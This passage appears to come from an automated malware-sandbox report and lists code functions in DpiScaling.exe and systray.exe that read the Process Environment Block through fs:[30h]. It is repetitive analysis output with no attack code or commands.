Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469B8D0 mov ecx, dword ptr fs:[00000030h] 13_2_0469B8D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0469B8D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0469B8D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0469B8D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0469B8D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h] 13_2_046320A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h] 13_2_046320A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h] 13_2_046320A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h] 13_2_046320A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h] 13_2_046320A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h] 13_2_046320A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046490AF mov eax, dword ptr fs:[00000030h] 13_2_046490AF
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463F0BF mov ecx, dword ptr fs:[00000030h] 13_2_0463F0BF
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463F0BF mov eax, dword ptr fs:[00000030h] 13_2_0463F0BF
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463F0BF mov eax, dword ptr fs:[00000030h] 13_2_0463F0BF
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04609080 mov eax, dword ptr fs:[00000030h] 13_2_04609080
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04683884 mov eax, dword ptr fs:[00000030h] 13_2_04683884
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04683884 mov eax, dword ptr fs:[00000030h] 13_2_04683884
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460C962 mov eax, dword ptr fs:[00000030h] 13_2_0460C962
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460B171 mov eax, dword ptr fs:[00000030h] 13_2_0460B171
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460B171 mov eax, dword ptr fs:[00000030h] 13_2_0460B171
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462B944 mov eax, dword ptr fs:[00000030h] 13_2_0462B944
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462B944 mov eax, dword ptr fs:[00000030h] 13_2_0462B944
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04624120 mov eax, dword ptr fs:[00000030h] 13_2_04624120
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04624120 mov eax, dword ptr fs:[00000030h] 13_2_04624120
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04624120 mov eax, dword ptr fs:[00000030h] 13_2_04624120
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04624120 mov eax, dword ptr fs:[00000030h] 13_2_04624120
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04624120 mov ecx, dword ptr fs:[00000030h] 13_2_04624120
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463513A mov eax, dword ptr fs:[00000030h] 13_2_0463513A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463513A mov eax, dword ptr fs:[00000030h] 13_2_0463513A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04609100 mov eax, dword ptr fs:[00000030h] 13_2_04609100
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04609100 mov eax, dword ptr fs:[00000030h] 13_2_04609100
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04609100 mov eax, dword ptr fs:[00000030h] 13_2_04609100
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046941E8 mov eax, dword ptr fs:[00000030h] 13_2_046941E8
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0460B1E1
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0460B1E1
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0460B1E1
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046361A0 mov eax, dword ptr fs:[00000030h] 13_2_046361A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046361A0 mov eax, dword ptr fs:[00000030h] 13_2_046361A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046869A6 mov eax, dword ptr fs:[00000030h] 13_2_046869A6
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046851BE mov eax, dword ptr fs:[00000030h] 13_2_046851BE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046851BE mov eax, dword ptr fs:[00000030h] 13_2_046851BE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046851BE mov eax, dword ptr fs:[00000030h] 13_2_046851BE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046851BE mov eax, dword ptr fs:[00000030h] 13_2_046851BE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462C182 mov eax, dword ptr fs:[00000030h] 13_2_0462C182
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463A185 mov eax, dword ptr fs:[00000030h] 13_2_0463A185
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632990 mov eax, dword ptr fs:[00000030h] 13_2_04632990
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046BB260 mov eax, dword ptr fs:[00000030h] 13_2_046BB260
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046BB260 mov eax, dword ptr fs:[00000030h] 13_2_046BB260
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D8A62 mov eax, dword ptr fs:[00000030h] 13_2_046D8A62
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0464927A mov eax, dword ptr fs:[00000030h] 13_2_0464927A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04609240 mov eax, dword ptr fs:[00000030h] 13_2_04609240
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04609240 mov eax, dword ptr fs:[00000030h] 13_2_04609240
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04609240 mov eax, dword ptr fs:[00000030h] 13_2_04609240
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04609240 mov eax, dword ptr fs:[00000030h] 13_2_04609240
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CEA55 mov eax, dword ptr fs:[00000030h] 13_2_046CEA55
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04694257 mov eax, dword ptr fs:[00000030h] 13_2_04694257
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04644A2C mov eax, dword ptr fs:[00000030h] 13_2_04644A2C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04644A2C mov eax, dword ptr fs:[00000030h] 13_2_04644A2C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04618A0A mov eax, dword ptr fs:[00000030h] 13_2_04618A0A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04605210 mov eax, dword ptr fs:[00000030h] 13_2_04605210
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04605210 mov ecx, dword ptr fs:[00000030h] 13_2_04605210
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04605210 mov eax, dword ptr fs:[00000030h] 13_2_04605210
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04605210 mov eax, dword ptr fs:[00000030h] 13_2_04605210
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460AA16 mov eax, dword ptr fs:[00000030h] 13_2_0460AA16
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460AA16 mov eax, dword ptr fs:[00000030h] 13_2_0460AA16
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CAA16 mov eax, dword ptr fs:[00000030h] 13_2_046CAA16
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CAA16 mov eax, dword ptr fs:[00000030h] 13_2_046CAA16
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04623A1C mov eax, dword ptr fs:[00000030h] 13_2_04623A1C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632AE4 mov eax, dword ptr fs:[00000030h] 13_2_04632AE4
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632ACB mov eax, dword ptr fs:[00000030h] 13_2_04632ACB
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h] 13_2_046052A5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h] 13_2_046052A5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h] 13_2_046052A5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h] 13_2_046052A5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h] 13_2_046052A5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461AAB0 mov eax, dword ptr fs:[00000030h] 13_2_0461AAB0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461AAB0 mov eax, dword ptr fs:[00000030h] 13_2_0461AAB0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463FAB0 mov eax, dword ptr fs:[00000030h] 13_2_0463FAB0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463D294 mov eax, dword ptr fs:[00000030h] 13_2_0463D294
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463D294 mov eax, dword ptr fs:[00000030h] 13_2_0463D294
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460DB60 mov ecx, dword ptr fs:[00000030h] 13_2_0460DB60
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04633B7A mov eax, dword ptr fs:[00000030h] 13_2_04633B7A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04633B7A mov eax, dword ptr fs:[00000030h] 13_2_04633B7A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460DB40 mov eax, dword ptr fs:[00000030h] 13_2_0460DB40
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D8B58 mov eax, dword ptr fs:[00000030h] 13_2_046D8B58
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460F358 mov eax, dword ptr fs:[00000030h] 13_2_0460F358
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C131B mov eax, dword ptr fs:[00000030h] 13_2_046C131B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h] 13_2_046303E2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h] 13_2_046303E2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h] 13_2_046303E2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h] 13_2_046303E2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h] 13_2_046303E2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h] 13_2_046303E2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462DBE9 mov eax, dword ptr fs:[00000030h] 13_2_0462DBE9
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046853CA mov eax, dword ptr fs:[00000030h] 13_2_046853CA
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046853CA mov eax, dword ptr fs:[00000030h] 13_2_046853CA
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D5BA5 mov eax, dword ptr fs:[00000030h] 13_2_046D5BA5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04634BAD mov eax, dword ptr fs:[00000030h] 13_2_04634BAD
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04634BAD mov eax, dword ptr fs:[00000030h] 13_2_04634BAD
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04634BAD mov eax, dword ptr fs:[00000030h] 13_2_04634BAD
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C138A mov eax, dword ptr fs:[00000030h] 13_2_046C138A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046BD380 mov ecx, dword ptr fs:[00000030h] 13_2_046BD380
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04611B8F mov eax, dword ptr fs:[00000030h] 13_2_04611B8F
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04611B8F mov eax, dword ptr fs:[00000030h] 13_2_04611B8F
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463B390 mov eax, dword ptr fs:[00000030h] 13_2_0463B390
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632397 mov eax, dword ptr fs:[00000030h] 13_2_04632397
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454C450 mov eax, dword ptr fs:[00000030h] 20_2_0454C450
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454C450 mov eax, dword ptr fs:[00000030h] 20_2_0454C450
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EA44B mov eax, dword ptr fs:[00000030h] 20_2_044EA44B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D0050 mov eax, dword ptr fs:[00000030h] 20_2_044D0050
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D0050 mov eax, dword ptr fs:[00000030h] 20_2_044D0050
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D746D mov eax, dword ptr fs:[00000030h] 20_2_044D746D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04572073 mov eax, dword ptr fs:[00000030h] 20_2_04572073
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04581074 mov eax, dword ptr fs:[00000030h] 20_2_04581074
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04537016 mov eax, dword ptr fs:[00000030h] 20_2_04537016
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04537016 mov eax, dword ptr fs:[00000030h] 20_2_04537016
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04537016 mov eax, dword ptr fs:[00000030h] 20_2_04537016
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04584015 mov eax, dword ptr fs:[00000030h] 20_2_04584015
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04584015 mov eax, dword ptr fs:[00000030h] 20_2_04584015
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h] 20_2_04571C06
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0458740D mov eax, dword ptr fs:[00000030h] 20_2_0458740D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0458740D mov eax, dword ptr fs:[00000030h] 20_2_0458740D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0458740D mov eax, dword ptr fs:[00000030h] 20_2_0458740D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536C0A mov eax, dword ptr fs:[00000030h] 20_2_04536C0A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536C0A mov eax, dword ptr fs:[00000030h] 20_2_04536C0A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536C0A mov eax, dword ptr fs:[00000030h] 20_2_04536C0A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536C0A mov eax, dword ptr fs:[00000030h] 20_2_04536C0A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EBC2C mov eax, dword ptr fs:[00000030h] 20_2_044EBC2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E002D mov eax, dword ptr fs:[00000030h] 20_2_044E002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E002D mov eax, dword ptr fs:[00000030h] 20_2_044E002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E002D mov eax, dword ptr fs:[00000030h] 20_2_044E002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E002D mov eax, dword ptr fs:[00000030h] 20_2_044E002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E002D mov eax, dword ptr fs:[00000030h] 20_2_044E002D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CB02A mov eax, dword ptr fs:[00000030h] 20_2_044CB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CB02A mov eax, dword ptr fs:[00000030h] 20_2_044CB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CB02A mov eax, dword ptr fs:[00000030h] 20_2_044CB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CB02A mov eax, dword ptr fs:[00000030h] 20_2_044CB02A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h] 20_2_0454B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454B8D0 mov ecx, dword ptr fs:[00000030h] 20_2_0454B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h] 20_2_0454B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h] 20_2_0454B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h] 20_2_0454B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h] 20_2_0454B8D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04588CD6 mov eax, dword ptr fs:[00000030h] 20_2_04588CD6
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536CF0 mov eax, dword ptr fs:[00000030h] 20_2_04536CF0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536CF0 mov eax, dword ptr fs:[00000030h] 20_2_04536CF0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536CF0 mov eax, dword ptr fs:[00000030h] 20_2_04536CF0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B58EC mov eax, dword ptr fs:[00000030h] 20_2_044B58EC
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045714FB mov eax, dword ptr fs:[00000030h] 20_2_045714FB
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B9080 mov eax, dword ptr fs:[00000030h] 20_2_044B9080
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04533884 mov eax, dword ptr fs:[00000030h] 20_2_04533884
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04533884 mov eax, dword ptr fs:[00000030h] 20_2_04533884
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C849B mov eax, dword ptr fs:[00000030h] 20_2_044C849B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F90AF mov eax, dword ptr fs:[00000030h] 20_2_044F90AF
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h] 20_2_044E20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h] 20_2_044E20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h] 20_2_044E20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h] 20_2_044E20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h] 20_2_044E20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h] 20_2_044E20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EF0BF mov ecx, dword ptr fs:[00000030h] 20_2_044EF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EF0BF mov eax, dword ptr fs:[00000030h] 20_2_044EF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EF0BF mov eax, dword ptr fs:[00000030h] 20_2_044EF0BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DB944 mov eax, dword ptr fs:[00000030h] 20_2_044DB944
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DB944 mov eax, dword ptr fs:[00000030h] 20_2_044DB944
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F3D43 mov eax, dword ptr fs:[00000030h] 20_2_044F3D43
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04533540 mov eax, dword ptr fs:[00000030h] 20_2_04533540
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D7D50 mov eax, dword ptr fs:[00000030h] 20_2_044D7D50
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BC962 mov eax, dword ptr fs:[00000030h] 20_2_044BC962
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BB171 mov eax, dword ptr fs:[00000030h] 20_2_044BB171
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BB171 mov eax, dword ptr fs:[00000030h] 20_2_044BB171
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DC577 mov eax, dword ptr fs:[00000030h] 20_2_044DC577
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DC577 mov eax, dword ptr fs:[00000030h] 20_2_044DC577
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B9100 mov eax, dword ptr fs:[00000030h] 20_2_044B9100
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B9100 mov eax, dword ptr fs:[00000030h] 20_2_044B9100
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B9100 mov eax, dword ptr fs:[00000030h] 20_2_044B9100
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0453A537 mov eax, dword ptr fs:[00000030h] 20_2_0453A537
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04588D34 mov eax, dword ptr fs:[00000030h] 20_2_04588D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D4120 mov eax, dword ptr fs:[00000030h] 20_2_044D4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D4120 mov eax, dword ptr fs:[00000030h] 20_2_044D4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D4120 mov eax, dword ptr fs:[00000030h] 20_2_044D4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D4120 mov eax, dword ptr fs:[00000030h] 20_2_044D4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D4120 mov ecx, dword ptr fs:[00000030h] 20_2_044D4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457E539 mov eax, dword ptr fs:[00000030h] 20_2_0457E539
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E513A mov eax, dword ptr fs:[00000030h] 20_2_044E513A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E513A mov eax, dword ptr fs:[00000030h] 20_2_044E513A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E4D3B mov eax, dword ptr fs:[00000030h] 20_2_044E4D3B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E4D3B mov eax, dword ptr fs:[00000030h] 20_2_044E4D3B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E4D3B mov eax, dword ptr fs:[00000030h] 20_2_044E4D3B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h] 20_2_044C3D34
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BAD30 mov eax, dword ptr fs:[00000030h] 20_2_044BAD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h] 20_2_04536DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h] 20_2_04536DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h] 20_2_04536DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536DC9 mov ecx, dword ptr fs:[00000030h] 20_2_04536DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h] 20_2_04536DC9
